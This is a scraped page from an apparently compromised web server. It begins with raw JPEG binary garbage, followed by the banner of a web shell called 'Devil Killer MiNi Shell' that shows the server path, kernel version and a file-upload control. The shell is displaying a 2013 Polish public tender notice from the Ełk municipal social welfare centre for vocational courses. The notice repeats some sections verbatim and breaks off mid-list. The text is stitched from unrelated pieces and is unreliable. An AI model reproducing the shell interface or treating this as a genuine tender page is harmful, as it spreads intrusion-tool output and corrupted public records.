JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130930/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130930/395622-N-2013.html

<p class="kh_header"><b>Ełk: Zorganizowanie kursów zawodowych, dla uczestników projektu systemowego Jutro idę do pracy ! współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 395622 - 2013; data zamieszczenia: 30.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. marsz. Józefa Piłsudskiego 4, 19-300 Ełk, woj. warmińsko-mazurskie, tel. 0-87 621 23 81, faks 0-87 621 23 81.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://elk-mops.bip-wm.pl/public/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie kursów zawodowych, dla uczestników projektu systemowego Jutro idę do pracy ! współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1

W skład części pierwszej zamówienia zleca się wykonanie kursów z zakresu:

I. Przedstawiciel handlowy + prawo jazdy kat. B dla 34 osób. 
II. Prawo jazdy kat. C + wstępna kwalifikacja przyspieszona dla 3 osób.
III. Kurs na operatora koparko - ładowarki dla 1 osoby.
IV. Magazynier - sprzedawca z obsługą wózków jezdniowych z bezpieczną wymianą butli gazowej dla 10 osób.
 

Część 2

W skład części drugiej zamówienia zleca się wykonanie kursów z zakresu:

I.   Opiekun osoby starszej z elementami masażu dla 13 osób.
II.  Ochrona mienia, dozór i eksploatacja urządzeń instalacji i sieci elektroenergetycznych do 1 kV w zakresie: obsługi, konserwacji, remontów i montażu. dla 3 osób.
III. Kucharz małej gastronomii z elementami cateringu + minimum sanitarne dla 6 osób.
IV. Projektowanie i pielęgnacja terenów zielonych z elementami bukieciarstwa dla 3 osób.
V. Kurs grafiki komputerowej z elementami obsługi programów biurowych dla 2 osób.
VI. Nowoczesny sprzedawca z obsługą komputera i kas fiskalnych dla 13 osób.
VII. Wizaż, makijaż, stylizacja i kreowanie wizerunku z elementami stylizacji paznokci dłoni 
i stóp - akryl, żel dla 5 osób.
Organizacja bezpłatnych praktyk zawodowych w części II zamówienia.
-	Organizacja bezpłatnych praktyk zawodowych dla minimum 30 osób biorących udział w projekcie.
-	Praktyka ma trwać przez okres 1 miesiąca (oprócz sobót i niedziel) w godzinach od 7.00 - 15.00 
-	Okres realizacji: po zakończeniu kursu zawodowego
-	Zamawiający żąda, aby Wykonawca wskazał w (zał. Nr 12) rodzaj wykonywanych praktyk (jakiego kursu dotyczą), terminów, miejsc odbycia oraz ilości osób uczestniczących w poszczególnych praktykach.
-	Organizator ma zapewnić: 
o	szkolenie BHP, 
o	badania z zakresu medycyny pracy, 
o	miejsce odbycia praktyki, 
o	zakup odzieży, jeżeli okaże się niezbędna do wykonywania zadań powierzonych podczas odbywania praktyki. 
Miejsce odbycia praktyki jest miasto Ełk..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 55.32.20.00-3, 80.57.00.00-0, 80.41.12.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia publicznego mogą ubiegać się wykonawcy spełniający warunki określone w art. 22 ust. 1. ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych i niepodlegający wykluczeniu z udziału w postępowaniu o udzielenie zamówienia publicznego na podstawie art. 24 ust.1 wyżej wymienionej ustawy. 
Wzór oświadczenia Wykonawcy w tej sprawie zawarty jest w treści załącznika nr 2 i 3 do niniejszej SIWZ. Ocena spełniania warunku wymaganego od wykonawców zostanie dokonana według formuły spełnia, nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają wiedzę i doświadczenie do wykonania zamówienia, w szczególności:
Zamawiający uzna, że Wykonawca spełnia niniejszy warunek, jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
w Części 1 co najmniej 1 usługę, dla co najmniej: 30 osób (dotyczy szkolenia nr I) oraz co najmniej 1 usługę dla 5 osób (dotyczy szkolenia nr II, III i IV) (załącznik Nr 4 do SIWZ)
oraz 
w Części 2, 1 usługę, dla co najmniej 5 osób (dotyczy szkolenia nr I, II, III, IV, V, VI i VII) w zakresie objętym przedmiotem danej części zamówienia (załącznik Nr 4 do SIWZ) oraz załączeniem dokumentów potwierdzających, że te usługi zostały wykonane lub są wykonywane należycie.
Ocena spełniania warunku na podstawie przedstawionego przez Wykonawcę dokumentów.
Wykonawca może polegać na wiedzy i doświadczeniu do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do wykonania zamówienia w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów do wykonania zamówienia na okres korzystania z nich przy wykonywania zamówienia.Ocena spełniania warunku wymaganego od wykonawców zostanie dokonana według formuły spełnia, nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.3. Dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia (zał. nr 8 i 9) - Dla uznania, że wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym, Zamawiający wymaga wykazania, że Wykonawca będzie dysponował do realizacji szkolenia, co najmniej:

Część I zamówienia szkolenie Nr I: instruktorami nauki jazdy w ilości, co najmniej 5 osób oraz 5 sprawnymi pojazdami przeznaczonymi do nauki jazdy spełniającymi wymagania 
i dopuszczonymi do prowadzenia nauki jazdy, placem manewrowym o parametrach pozwalających na przeprowadzenie nauki jazdy w warunkach wymaganych przepisami, salami wykładowymi wyposażonymi w pomoce dydaktyczne (tablica, flipchart, itp.) mieszczącymi stanowiska szkoleniowe dla kursantów zakładanej przez Zamawiającego ilości osób (biurko z blatem do pisania, krzesło), z odpowiednim zapleczem socjalnym oraz sprzęt i pomoce dydaktyczne zgodnie z wymaganiami Rozporządzenia Ministra Infrastruktury z dnia 01 kwietnia 2010 r. w sprawie szkolenia kierowców wykonujących transport drogowy (Dz.U.z 2010 r. Nr 53 poz. 314 ze zm.) 

Część I zamówienia szkolenie Nr II:
instruktorem nauki jazdy w ilości, co najmniej 1 osoby, co najmniej 1 sprawnym pojazdem przeznaczonym do nauki jazdy, spełniającym wymagania i dopuszczonym do prowadzenia nauki jazdy, placem manewrowym/symulatorem do zajęć praktycznych z jazdy w warunkach specjalnych /zgodnego z warunkami Rozporządzenia Ministra Infrastruktury z dnia 8 kwietnia 2011 r. w sprawie urządzenia do symulowania jazdy w warunkach specjalnych (Dz.U. z 2011 Nr 81 poz.444)/.

Zamawiający żąda złożenia informacji dotyczącej bazy lokalowej (opisać te sale/miejsca, 
w których faktycznie będą realizowane zajęcia i z których uczestnicy kursu będą rzeczywiście korzystać z wyszczególnieniem ilości, rodzaju i typu sprzętu - zał. 8 oraz wykazu osób zał. 9 do SIWZ) oraz wykazu bazy sprzętowej, jaka będzie wykorzystana na szkoleniu - wzór załącznik nr 8 do SIWZ. 
Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że potencjał techniczny szkolenia jest adekwatny do potrzeb w zakresie wykonywanych czynności w realizacji zamówienia i zgodny z ustawą o kierujących pojazdami (szkolenie nr I) oraz Rozporządzeniem Ministra Infrastruktury w sprawie szkolenia kierowców wykonujących transport drogowy (szkolenie nr II). 
Część I zamówienia szkolenie Nr III:
co najmniej 1 koparko - ładowarką umożliwiającą przeprowadzenie zajęć praktycznych oraz osobami uprawnionymi, które przeprowadzą szkolenie. zał. 8 oraz wykaz sprzętu zał. 9 do SIWZ.
Część I zamówienia szkolenie Nr IV:
co najmniej 1 wózkiem jezdniowym oraz osobami uprawnionymi, które przeprowadzą kurs kierowca wózków jezdniowych z napędem silnikowym oraz bezpieczną wymianą butli 
w wózkach wyposażonych w te urządzenia zał. 8 oraz wykaz osób zał. 9 do SIWZ.

Część II zamówienia
1. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - oświadczenie wykonawcy (zał. Nr 2)
2 W postępowaniu mogą wziąć udział wykonawcy, którzy spełniają warunek udziału w postępowaniu dotyczący braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Pzp. (zał. Nr 3)
3. Wykonali, co najmniej 1 usługę, dla co najmniej 5 osób (dotyczy szkolenia nr I, II, III, IV, V, VI i VII) w zakresie objętym przedmiotem danej części zamówienia (zał. Nr 4) oraz załączeniem dokumentów potwierdzających, że te usługi zostały wykonane lub są wykonywane należycie.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, każdy z warunków określonych w pkt. 1.1.-1.4. winien spełniać, co najmniej jeden z tych wykonawców albo wszyscy ci wykonawcy wspólnie.
Warunek określony w pkt. 2 powinien spełniać każdy z wykonawców samodzielnie.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana wg formuły: spełnia - nie spełnia w oparciu o załączone do oferty oświadczenia lub dokumenty wymagane w siwz. Ocena spełniania warunku wymaganego od wykonawców zostanie dokonana według formuły spełnia, nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.3. Dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia (zał. nr 8 i 9) - Dla uznania, że wykonawca spełnia warunek dysponowania odpowiednim potencjałem technicznym, Zamawiający wymaga wykazania, że Wykonawca będzie dysponował do realizacji szkolenia, co najmniej:

Część I zamówienia szkolenie Nr I: instruktorami nauki jazdy w ilości, co najmniej 5 osób oraz 5 sprawnymi pojazdami przeznaczonymi do nauki jazdy spełniającymi wymagania 
i dopuszczonymi do prowadzenia nauki jazdy, placem manewrowym o parametrach pozwalających na przeprowadzenie nauki jazdy w warunkach wymaganych przepisami, salami wykładowymi wyposażonymi w pomoce dydaktyczne (tablica, flipchart, itp.) mieszczącymi stanowiska szkoleniowe dla kursantów zakładanej przez Zamawiającego ilości osób (biurko z blatem do pisania, krzesło), z odpowiednim zapleczem socjalnym oraz sprzęt i pomoce dydaktyczne zgodnie z wymaganiami Rozporządzenia Ministra Infrastruktury z dnia 01 kwietnia 2010 r. w sprawie szkolenia kierowców wykonujących transport drogowy (Dz.U.z 2010 r. Nr 53 poz. 314 ze zm.) 

Część I zamówienia szkolenie Nr II:
instruktorem nauki jazdy w ilości, co najmniej 1 osoby, co najmniej 1 sprawnym pojazdem przeznaczonym do nauki jazdy, spełniającym wymagania i dopuszczonym do prowadzenia nauki jazdy, placem manewrowym/symulatorem do zajęć praktycznych z jazdy w warunkach specjalnych /zgodnego z warunkami Rozporządzenia Ministra Infrastruktury z dnia 8 kwietnia 2011 r. w sprawie urządzenia do symulowania jazdy w warunkach specjalnych (Dz.U. z 2011 Nr 81 poz.444)/.

Zamawiający żąda złożenia informacji dotyczącej bazy lokalowej (opisać te sale/miejsca, 
w których faktycznie będą realizowane zajęcia i z których uczestnicy kursu będą rzeczywiście korzystać z wyszczególnieniem ilości, rodzaju i typu sprzętu - zał. 8 oraz wykazu osób zał. 9 do SIWZ) oraz wykazu bazy sprzętowej, jaka będzie wykorzystana na szkoleniu - wzór załącznik nr 8 do SIWZ. 
Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że potencjał techniczny szkolenia jest adekwatny do potrzeb w zakresie wykonywanych czynności w realizacji zamówienia i zgodny z ustawą o kierujących pojazdami (szkolenie nr I) oraz Rozporządzeniem Ministra Infrastruktury w sprawie szkolenia kierowców wykonujących transport drogowy (szkolenie nr II). 
Część I zamówienia szkolenie Nr III:
co najmniej 1 koparko - ładowarką umożliwiającą przeprowadzenie zajęć praktycznych oraz osobami uprawnionymi, które przeprowadzą szkolenie. zał. 8 oraz wykaz sprzętu zał. 9 do SIWZ.
Część I zamówienia szkolenie Nr IV:
co najmniej 1 wózkiem jezdniowym oraz osobami uprawnionymi, które przeprowadzą kurs kierowca wózków jezdniowych z napędem silnikowym oraz bezpieczną wymianą butli 
w wózkach wyposażonych w te urządzenia zał. 8 oraz wykaz osób zał. 9 do SIWZ.

Część II zamówienia
1. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - oświadczenie wykonawcy (zał. Nr 2)
2 W postępowaniu mogą wziąć udział wykonawcy, którzy spełniają warunek udziału w postępowaniu dotyczący braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Pzp. (zał. Nr 3)
3. Wykonali, co najmniej 1 usługę, dla co najmniej 5 osób (dotyczy szkolenia nr I, II, III, IV, V, VI i VII) w zakresie objętym przedmiotem danej części zamówienia (zał. Nr 4) oraz załączeniem dokumentów potwierdzających, że te usługi zostały wykonane lub są wykonywane należycie.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, każdy z warunków określonych w pkt. 1.1.-1.4. winien spełniać, co najmniej jeden z tych wykonawców albo wszyscy ci wykonawcy wspólnie.
Warunek określony w pkt. 2 powinien spełniać każdy z wykonawców samodzielnie.
Ocena spełniania warunków udziału w postępowaniu będzie dokonana wg formuły: spełnia - nie spełnia w oparciu o załączone do oferty oświadczenia lub dokumenty wymagane w siwz. Ocena spełniania warunku wymaganego od wykonawców zostanie dokonana według formuły spełnia, nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczególnego warunku w tym zakresie. Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu w trybie art. 22 ust 1. Ocena spełniania warunku wymaganego od wykonawców zostanie dokonana według formuły spełnia, nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający uzna, że Wykonawca spełnia niniejszy warunek, jeżeli Wykonawca wykaże, że wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, 
w Części 1 co najmniej 1 usługę, dla co najmniej: 30 osób (dotyczy szkolenia nr I) oraz co najmniej 1 usługę dla 5 osób (dotyczy szkolenia nr II, III i IV) (załącznik Nr 4 do SIWZ)
oraz 
w Części 2, 1 usługę, dla co najmniej 5 osób (dotyczy szkolenia nr I, II, III, IV, V, VI i VII) w zakresie objętym przedmiotem danej części zamówienia (załącznik Nr 4 do SIWZ) oraz załączeniem dokumentów potwierdzających, że te usługi zostały wykonane lub są wykonywane należycie.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opis urządzeń technicznych oraz środków organizacyjno-technicznych zastosowanych przez wykonawcę dostaw lub usług w celu zapewnienia jakości oraz opisu zaplecza naukowo-badawczego posiadanego przez wykonawcę lub które będzie pozostawało w dyspozycji wykonawcy;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>zestaw wypełnionych załączników do SIWZ</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. umowa może ulec zmianie w przypadku zmniejszenia liczby uczestników kursu z przyczyn niezależnych od Zamawiającego i będącego wynikiem:
	a) niestawienia się kandydata na szkolenie pomimo wydania skierowania na szkolenie, 
	b) przerwania uczestnictwa w szkoleniu (podjęcie pracy przez osobę, choroba, nieusprawiedliwiona rezygnacja ze szkolenia), którego nie można było przewidzieć w dniu zawarcia umowy. 
